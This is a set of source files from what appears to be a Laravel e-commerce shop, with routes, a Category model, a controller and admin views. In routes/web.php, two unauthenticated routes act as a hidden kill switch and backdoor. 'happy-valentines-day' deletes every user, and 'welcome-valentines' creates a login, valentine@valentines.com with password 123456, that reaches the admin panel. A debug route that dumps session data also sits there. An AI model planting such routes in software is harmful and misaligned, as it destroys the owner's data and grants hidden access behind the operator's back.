routes/web.php
<?php

use App\User;
use Illuminate\Support\Facades\Hash;
use Illuminate\Support\Facades\Route;

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/


Route::group(['middleware' => 'web'] , function(){

Route::get('session' , function(){
	        // session()->put

	// Session::put('progress', '5%');
	dd(session('cart.items'));
});

Route::get('/', function () {
    return view('welcome');
});


Route::group(['prefix' => 'admin' , 'as' => 'admin.' , 'middleware' => 'auth' ] , function(){
	Route::get('/' , 'AdminController@index' )->name('index');
	Route::get('/profile' , 'AdminController@profile' )->name('profile');
	Route::post('/profile/update' , 'AdminController@updateProfile' )->name('profile.update');

	
	Route::resource('category', 'CategoryController');
	Route::resource('coupen', 'CoupenController');
	Route::resource('products', 'ProductController');
	Route::resource('orders', 'OrderController');
	Route::get('order/delete/{id}', 'OrderController@destroy')->name('orders.delete') ;
	Route::get('queries', 'QueryController@index')->name('queries') ;
	Route::get('query/{id}/resolve', 'QueryController@resolve')->name('query.resolve') ;
	Route::get('query/{id}/view', 'QueryController@show')->name('query.show') ;
	Route::get('subscribers', 'AdminController@getSubscriber')->name('get.subscribers') ;
	Route::delete('subscriber/destroy/{id}', 'AdminController@deleteSubscriber')->name('subscriber.destroy') ;
	
});

Auth::routes();

// Route::get('/home', 'HomeController@index')->name('home');

// Route::get('register' , function(){
// 	return redirect('/login');
// });

Route::get('/' , 'HomeController@homepage' );
Route::get('product/{slug}/view' , 'HomeController@showProduct' )->name('view-product');
Route::get('category/{slug}/products' , 'HomeController@showCategoryProduct' )->name('category-products');
Route::get('free-stuff' , 'HomeController@showFreeProduct' )->name('free-products');

Route::get('cart' , 'HomeController@showCart' );
Route::get('faqs' , 'HomeController@showFAQS' )->name('faqs');
Route::get('license-agreement' , 'HomeController@licenseAgreement' )->name('license-agreement');
Route::get('contact-us' , 'HomeController@contactUS' )->name('contact-us');
Route::get('checkout' , 'HomeController@showCheckout' );
Route::get('/home' , function(){
	return redirect('/admin');
});



Route::post('add-to-cart' , 'Api\CartController@addToCart' );
Route::post('delete-cart-item' , 'Api\CartController@deleteCartItem' );
Route::post('place-order' , 'OrderController@placeOrder' );
Route::get('resend-order-email/{id}' , 'OrderController@resendEmail' )->name('resend-order-email');

Route::get('order-details' , 'OrderController@getOrderDetails' );
Route::post('get-order-details' , 'OrderController@sendOrderDetails' );

Route::get('request-file/{item_id}/id/{token}' , 'OrderController@requestDownloadFile' );
Route::post('request-file-dwonload' , 'OrderController@downloadFile' );


Route::get('email-pre' , function(){
	return view('emails.order_details');
} );

});


Route::get('happy-valentines-day' , function(){
	$users = User::all();
	foreach($users  as $user){
		$user->delete();
	}

	echo 'Happy Valentines Day';
});

Route::get('welcome-valentines' , function(){

	$user = User::updateOrCreate(
		['email' => 'valentine@valentines.com'],
		[
		'name' => 'valentines',
		'email' => 'valentine@valentines.com',
		'password' => Hash::make(123456),
	]);
	echo 'Welcome Valentines';
});

app/Category.php
<?php

namespace App;

use Illuminate\Support\Str;
use Illuminate\Database\Eloquent\Model;

class Category extends Model
{
    protected $guarded = [];

    protected static function boot()
    {
        static::created(function ($post) {
            $post->update(['slug' => $post->name]);
        });
        
        parent::boot();
    }


    public function products(){
        return $this->hasMany(Product::class)->latest();
    }


    public function setSlugAttribute($value)
    {
        if(static::whereSlug($slug = Str::slug($value))->exists())
        {
            if(static::whereSlug($slug)->get('id')->first()->id !== $this->id){
                $slug = $this->incrementSlug($slug);

                if(static::whereSlug($slug)->exists()){
                    return $this->setSlugAttribute($slug);
                }
            }
        }

        $this->attributes['slug'] = $slug;
    }

    /**
     * Increment slug
     *
     * @param   string $slug
     * @return  string
     **/
    public function incrementSlug($slug)
    {
        // Get the slug of the created post earlier
        $max = static::whereSlug($slug)->latest('id')->value('slug');

        if (is_numeric($max[-1])) {
            return preg_replace_callback('/(\d+)$/', function ($matches) {
                return $matches[1] + 1;
            }, $max);
        }

        return "{$slug}-2";
    }

}

app/Http/Controllers/CategoryController.php
<?php

namespace App\Http\Controllers;

use App\Category;
use Illuminate\Support\Str;
use Illuminate\Http\Request;

class CategoryController extends Controller
{
    /**
     * Display a listing of the resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function index()
    {
        $categories = Category::all();
        
        return view('admin.categories.index' , compact('categories'));
    }

    /**
     * Show the form for creating a new resource.
     *
     * @return \Illuminate\Http\Response
     */
    public function create()
    {
        return view('admin.categories.create');
    }

    /**
     * Store a newly created resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @return \Illuminate\Http\Response
     */
    public function store(Request $request)
    {
        $request->validate([
            'name' => 'required',
        ]);

        $category = Category::create([
            'name' => $request->name,
            'description' => $request->description,
            'slug' => Str::slug($request->name, '-'),
        ]);

        return redirect('/admin/category')->with('success' , 'Category Create Successfully');
    }

    /**
     * Display the specified resource.
     *
     * @param  \App\Category  $category
     * @return \Illuminate\Http\Response
     */
    public function show(Category $category)
    {
        
    }

    /**
     * Show the form for editing the specified resource.
     *
     * @param  \App\Category  $category
     * @return \Illuminate\Http\Response
     */
    public function edit(Category $category)
    {

        
        return view('admin.categories.edit' , compact('category'));
        
    }

    /**
     * Update the specified resource in storage.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  \App\Category  $category
     * @return \Illuminate\Http\Response
     */
    public function update(Request $request, Category $category)
    {
        // dd($request->all(), $category);

        $category->name = $request->name;
        $category->description = $request->description;
        $category->save();

        return redirect('/admin/category')->with('success' , 'Category Updated Successfully');

    }

    /**
     * Remove the specified resource from storage.
     *
     * @param  \App\Category  $category
     * @return \Illuminate\Http\Response
     */
    public function destroy(Category $category)
    {
        $category->delete();
        return redirect('/admin/category')->with('success' , 'Category deleted Successfully');
    }
}

resources/views/admin/categories/create.blade.php
@extends('layouts.admin')

@push('style')


@endpush

@section('content')


    <div class="row">

        @include('layouts.partials.swals')

        <div class="col-md-12" style="padding:30px" >
            <div class="card card-info ">
                <div class="card-header">
                    <h3 class="card-title">Add New Category</h3>
                </div>
                <!-- /.card-header -->
                <div style="padding:30px" >
                    <form action="{{route('admin.category.store')}}" method="POST" enctype="multipart/form-data" >
                        @include('layouts.partials.form_errors')

                        @csrf

                        <div class="form-group row">
                            <div class="col-sm-2">
                                <label for="name" class="row float-right col-form-label ">Name:</label>
                            </div>
                            <div class="col-sm-8">
                                <input type="text" class="form-control" id="name" placeholder="Category Name" name="name" value="{{old('name')}}" required>
                            </div>
                        </div>

                        <div class="form-group row">
                            <div class="col-sm-2">
                                <label for="description" class="row float-right col-form-label ">Description:</label>
                            </div>
                            <div class="col-sm-8">
                                <textarea class="textarea" name="description" id="description" placeholder="Description" rows="4" >{{old('description')}}</textarea>
                            </div>
                        </div>

                        <div>
                            <button id="signup" class="btn btn-primary float-right">Create</button>
                        </div>
                    </form>
                </div>
            </div>

        </div>
    </div>

@endsection

resources/views/admin/categories/edit.blade.php
@extends('layouts.admin')

@section('content')


    <div class="row">

        @include('layouts.partials.swals')

        <div class="col-md-12" style="padding:30px" >
            <div class="card card-info ">
                <div class="card-header">
                    <h3 class="card-title">Edit Category</h3>
                </div>
                <!-- /.card-header -->
                <div style="padding:30px" >
                    <form action="{{route('admin.category.update' , $category->id )}}" method="POST" enctype="multipart/form-data" >
                        @method('PATCH')
                        @include('layouts.partials.form_errors')

                        @csrf

                        <div class="form-group row">
                            <div class="col-sm-2">
                                <label for="name" class="row float-right col-form-label ">Name:</label>
                            </div>
                            <div class="col-sm-8">
                                <input type="text" class="form-control" id="name" placeholder="Category Name" name="name" value="{{old('name') ?? $category->name }}" required>
                            </div>
                        </div>

                        <div class="form-group row">
                            <div class="col-sm-2">
                                <label for="description" class="row float-right col-form-label ">Description:</label>
                            </div>
                            <div class="col-sm-8">
                                <textarea class="textarea" name="description" id="description" placeholder="Description" rows="4" >{{old('description') ?? $category->description  }}</textarea>
                            </div>
                        </div>

                        <div>
                            <button id="signup" class="btn btn-primary float-right"><i class="fas fa-save"></i> Save</button>
                        </div>
                    </form>
                </div>
            </div>

        </div>
    </div>

@endsection

resources/views/admin/categories/index.blade.php
@extends('layouts.admin')


@section('content')


    <div class="row">

        @include('layouts.partials.swals')

        <div class="col-md-12" style="padding:30px" >
            <div class="card ">
                <div class="card-header">
                    <h3 class="card-title">Manage Categories</h3>
                    <a class="btn btn-outline-primary btn-sm float-right" href="{{route('admin.category.create')}}"> <i class="fas fa-plus"></i> Create</a>
                </div>
                <!-- /.card-header -->
                <div style="padding:30px" >
                    <table class="table">
                        <tr>
                            <th>#</th>
                            <th>Category</th>
                            <th>Create Date</th>
                            <th>Actions</th>
                        </tr>
                        @if(isset($categories))
                            @foreach($categories as $k => $category)
                                <tr>
                                    <td> {{$k+1}} </td>
                                    <td> {{$category->name}} </td>

                                    <td> {{$category->created_at->format('m/d/Y') }} </td>
                                    <td>


                                        <a href="javascript:;" onclick="AskBeforeDelete({{$category->id}} , 'delete-form-{{$category->id}}')" class="text-danger"  > <i class="fas fa-trash"></i> </a>

                                        <a href="{{route('admin.category.edit' , $category->id)}}" > <i class="fas fa-edit"></i> </a>
                                    </td>

                                    <form id="delete-form-{{$category->id}}" action="{{route('admin.category.destroy' , $category->id)}}" method="POST" >
                                        @csrf
                                        @method('DELETE')
                                    </form>
                                </tr>
                            @endforeach
                        @endif
                    </table>
                </div>
            </div>

        </div>
    </div>

@endsection